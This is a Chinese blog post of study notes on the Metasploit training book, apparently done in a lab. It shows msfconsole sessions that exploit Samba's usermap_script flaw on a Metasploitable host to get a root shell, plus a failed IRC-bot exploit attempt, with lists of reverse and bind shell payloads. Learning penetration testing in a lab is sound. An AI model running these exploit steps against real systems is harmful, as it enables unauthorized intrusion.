《Metasploit 魔鬼训练营》01 初识 Metasploit

最新推荐文章于 2023-12-13 16:00:24 发布
最新推荐文章于 2023-12-13 16:00:24 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: kali-linux 文章标签: msf-渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevinhanser/article/details/77504647
版权

1 . 使用 msf 图形化工具 armitage

从 armitage 菜单项中选择 exploits --> multi --> samba --> usermap_script
将显示对话渗透攻击模块进行参数配置的对话框,填写 RHOST 即可开始
完成后可以输入 uname -a 或者 whoami 进行检验

2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权

root@kali:~# msfconsole

msf > help search

Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

msf > search samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations

msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (172.16.0.132:32807 -> 172.16.0.135:4444) at 2017-08-16 08:27:37 -0400

uname -a
Linux www.metasploitable.tst 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami
root

3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权

msf > search vnc

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/vnc/realvnc_41_bypass                2006-05-15       normal     RealVNC NULL Authentication Mode Bypass
   auxiliary/scanner/vnc/vnc_login                                       normal     VNC Authentication Scanner
   auxiliary/scanner/vnc/vnc_none_auth                                   normal     VNC Authentication None Detection
   auxiliary/server/capture/vnc                                          normal     Authentication Capture: VNC
   exploit/multi/misc/legend_bot_exec                   2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   exploit/multi/vnc/vnc_keyboard_exec                  2015-07-10       great      VNC Keyboard Remote Code Execution
   exploit/windows/vnc/realvnc_client                   2001-01-29       normal     RealVNC 3.3.7 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_client                  2006-04-04       normal     UltraVNC 1.0.1 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_viewer_bof              2008-02-06       normal     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   exploit/windows/vnc/winvnc_http_get                  2001-01-29       average    WinVNC Web Server GET Overflow
   payload/windows/vncinject/bind_hidden_ipknock_tcp                     normal     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   payload/windows/vncinject/bind_hidden_tcp                             normal     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   payload/windows/vncinject/bind_ipv6_tcp                               normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   payload/windows/vncinject/bind_ipv6_tcp_uuid                          normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/bind_nonx_tcp                               normal     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   payload/windows/vncinject/bind_tcp                                    normal     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   payload/windows/vncinject/bind_tcp_rc4                                normal     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/bind_tcp_uuid                               normal     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/find_tag                                    normal     VNC Server (Reflective Injection), Find Tag Ordinal Stager
   payload/windows/vncinject/reverse_hop_http                            normal     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   payload/windows/vncinject/reverse_http                                normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   payload/windows/vncinject/reverse_http_proxy_pstore                   normal     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   payload/windows/vncinject/reverse_ipv6_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   payload/windows/vncinject/reverse_nonx_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_ord_tcp                             normal     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_tcp                                 normal     VNC Server (Reflective Injection), Reverse TCP Stager
   payload/windows/vncinject/reverse_tcp_allports                        normal     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   payload/windows/vncinject/reverse_tcp_dns                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   payload/windows/vncinject/reverse_tcp_rc4                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/reverse_tcp_rc4_dns                         normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   payload/windows/vncinject/reverse_tcp_uuid                            normal     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   payload/windows/vncinject/reverse_winhttp                             normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/bind_ipv6_tcp                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                      normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   payload/windows/x64/vncinject/bind_tcp                                normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   payload/windows/x64/vncinject/bind_tcp_uuid                           normal     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_http                            normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_https                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_tcp                             normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   payload/windows/x64/vncinject/reverse_tcp_uuid                        normal     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_winhttp                         normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/reverse_winhttps                        normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
   post/multi/gather/remmina_creds                                       normal     UNIX Gather Remmina Credentials
   post/osx/gather/enum_chicken_vnc_profile                              normal     OS X Gather Chicken of the VNC Profile
   post/windows/gather/credentials/mremote                               normal     Windows Gather mRemote Saved Password Extraction
   post/windows/gather/credentials/vnc                                   normal     Windows Gather VNC Password Extraction

msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)
   cmd/windows/adduser                                  normal  Windows Execute net user /ADD CMD
   cmd/windows/bind_lua                                 normal  Windows Command Shell, Bind TCP (via Lua)
   cmd/windows/bind_perl                                normal  Windows Command Shell, Bind TCP (via Perl)
   cmd/windows/bind_perl_ipv6                           normal  Windows Command Shell, Bind TCP (via perl) IPv6
   cmd/windows/bind_ruby                                normal  Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_eval_vbs                        normal  Windows Executable Download and Evaluate VBS
   cmd/windows/download_exec_vbs                        normal  Windows Executable Download and Execute (via .vbs)
   cmd/windows/generic                                  normal  Windows Command, Generic Command Execution
   cmd/windows/reverse_lua                              normal  Windows Command Shell, Reverse TCP (via Lua)
   cmd/windows/reverse_perl                             normal  Windows Command, Double Reverse TCP Connection (via Perl)
   cmd/windows/reverse_ruby                             normal  Windows Command Shell, Reverse TCP (via Ruby)

msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options

Module options (exploit/multi/misc/legend_bot_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHANNEL       #channel         yes       IRC Channel
   IRC_PASSWORD                   no        IRC Connection Password
   NICK          msf_user         yes       IRC Nickname
   RHOST                          yes       The target address
   RPORT         6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Legend IRC Bot

msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit

[*] Started reverse TCP double handler on 172.16.0.132:4444 
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Registering with the IRC Server...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Joining the #channel channel...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Exploiting the malicious IRC bot...
[*] Exploit completed, but no session was created.
实验未成功

4 . 总结过程

以 VNC 为例:
msf > search vnc

msf > use multi/misc/legend_bot_exec	

msf exploit(legend_bot_exec) > show payloads
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk	
payloads => cmd/unix/bind_awk	

msf exploit(legend_bot_exec) > show options
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135

msf exploit(legend_bot_exec) > exploit
网络安全打工人
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Metasploit_测试魔鬼训练营.zip
09-27
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试...很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践,实践,再实践”的宗旨。
metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透
2301_77162959的博客
05-29 1082
攻击者在溢出程序后,并不执行栈中的shellcode,而是寻找程序已加载模块中的一些特殊指令块,配合栈上的压栈参数,返回地址等数据,将这些孤立的指令块联系起来,从而实现一定的功能,最终完成远程代码执行的目标。metasploit框架中包含一些针对浏览器及插件的模块,并且还提供了辅助模块 server/browser——autopwn,它在接到来自浏览器的请求后,会依次做三个操作:提取浏览器指纹,自动化渗透,列出渗透模块,但是他不会列出第三方插件的利用模块,因为它无法提取到插件的指纹。4.2.1浏览器渗透。
Metasploit渗透测试魔鬼训练营》学习笔记
热门推荐
weixin_40133285的博客
05-16 4万+
Metasploit渗透测试魔鬼训练营 诸葛建伟 陈力波 孙松柏 王衍 田繁 学习笔记 |Linux Metasploitable | Linux靶机 | 下载vmware虚拟机镜像 |WinXP Metasploitable | Windows靶机 | 下载vmware虚拟机镜像 |OWASP BWA | Web服务器靶机| 下载vmware虚拟机镜像 |Win2K3 Metasploitable |Windows靶机 | 下载vmware虚拟机镜像
metasploit渗透测试魔鬼训练营》学习笔记第三章----情报搜集
2301_77162959的博客
05-28 489
Kali渗透测试系统集成了metasploit开源的漏洞测试框架,是渗透测试必备的神器。下面是我在学习metasploit的笔记,有什么错误的地方请指出来,我会立即纠正的~
Metasploit渗透测试魔鬼训练营
cyynid的博客
01-17 705
7)利益性:利益永远是各种攻击的驱动力,Web攻击也不例外。近期相关司法部门公布有组织性的Web应用攻击,谋取利益的犯罪团伙案件越来越多,无论直接攻击Web 应用服务器,还是攻击欺骗客户终端的钓鱼攻击,抑或是通过可怕的分布式拒绝服务攻击(DDoS)进行敲诈,通过Web犯罪可以说是利润丰厚。6)变化性:Web应用的调整对于一个业务经常变化的公司来说,可以算是家常便饭,但是对于调整Web应用的开发人员、系统管理员等,他们往往缺乏充分的安全培训,却有着对复杂网络应用修改的特权,这样很难保证安全策略很好的实施。
Metasploit渗透测试魔鬼训练营》之环境搭建
Miguel自学空间
12-13 1048
熟练掌握渗透测试的实验环境搭建内容,可以让我们更好的理解后续的渗透测试操作的目的与原理。本文记录了书中描述的实验环境的搭建过程的关键细节,包括环境拓扑资源下载硬件配置网络配置等,方便后续查阅。通过以上步骤完成对所有主机的配置后,可以通过ping命令测试这些主机相互之间的网络是否连通,从而验证配置是否正确。另外,也能通过ping命令测试这些主机与真实外网的连通性。通过配置实验环境,我们能更加熟悉整个网络拓扑结构,在进行渗透测试的时候,就能更清楚自己在进行的工作所针对的是哪个目标。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf ...
metasploit魔鬼训练营》学习中遇到的相关问题
08-19
在学习《metasploit魔鬼训练营》的过程中,遇到很多的问题,从搭建环境到进行测试,作为一个新手,踩过一些坑,记录下来,以备后查。
Metasploit Framework 1 part
积木网络
08-22 1386
1.目录结构 metasploit framework 进入update 输入:svn update 进行文件更新 2.MSF目录结构: data :包含meterpreter,PassiveX,VNC DLLs,还有一些用户接口的代码如msfweb,和一些插件用到的数据文件 documentiation:包含msf的文档,ruby脚本样例和msf利用的API external:包含
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7
qq_50854662的博客
05-16 4089
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感
Metasm练手 一
......
08-04 274
一、Metasm 是什么? Metasm是用纯Ruby写的一个支持多CPU架构的汇编器,反汇编器,编译器,连接器及调试器。 著名的安全漏洞检测工具Metasploit Framework也使用了Metasm。2011年4月份,Metasm的作者把Metasm放在了RubyGems.org上。   二、Metasm安装 Metasm是个gem,所以安装起来很简单: gem instal...
渗透测试靶机实战---系统篇04
一杯咖啡的渗透记忆
10-14 1208
(续)渗透测试靶机实战---系统篇03 10.rlogin Passwordless / Unencrypted Cleartext Login 上面可以看到直接空密码,rlogin直接进入到系统。 11. 上面openVas已经爆出了密码为password,利用如下: 可以利用metasploit爆破如下: msf5 auxiliary(scan...
基于Metasploit完成Samba服务漏洞复现
linxaiomo
03-10 7544
实验环境: 靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦) 攻击机ip:192.168.31.166(X64) 一:主机发现 arp-scan -l #扫描同一网段下的主机 可以看到靶机的IP地址和mac地址,Vmware为虚拟机 2.漏洞扫描 nmap 192.168.31.182.
linux的smb漏洞利用,Samba trans2open Overflow (Linux x86) - 婕忔礊鍒╃敤 - 0day,Exploit,Shellcode...
weixin_42160398的博客
05-24 394
### $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# ...
Metasploit魔鬼训练营学习笔记 (1)第三章
ClintSeven的博客
04-05 4240
metasploit 学习笔记第三章
使用Metasm来绕过杀毒软件
iteye_16188的博客
09-30 429
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件 1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary 2.拷贝metasm.rb文件和metasm文件夹到rub...
metasploit 魔鬼训练营 学习笔记(2) 第四章(web一些漏洞与防止)
ClintSeven的博客
04-12 318
metasploit 第四章开头以及之前学过的总结
metasploit-学习8--显示exploit的模块的所有exploit信息
简单就是美
06-19 2万+
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    -----------    aix/rpc_cmsd_opcod
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6163
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
metasploit渗透测试 魔鬼训练营
最新发布
12-31
Metasploit是一款广泛使用的渗透测试工具,也被称为"魔鬼训练营"。它是开源的,提供了一系列强大的功能和模块,用于发现和利用计算机系统中的漏洞,以评估系统的安全性和弱点。 Metasploit魔鬼训练营之所以得名,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值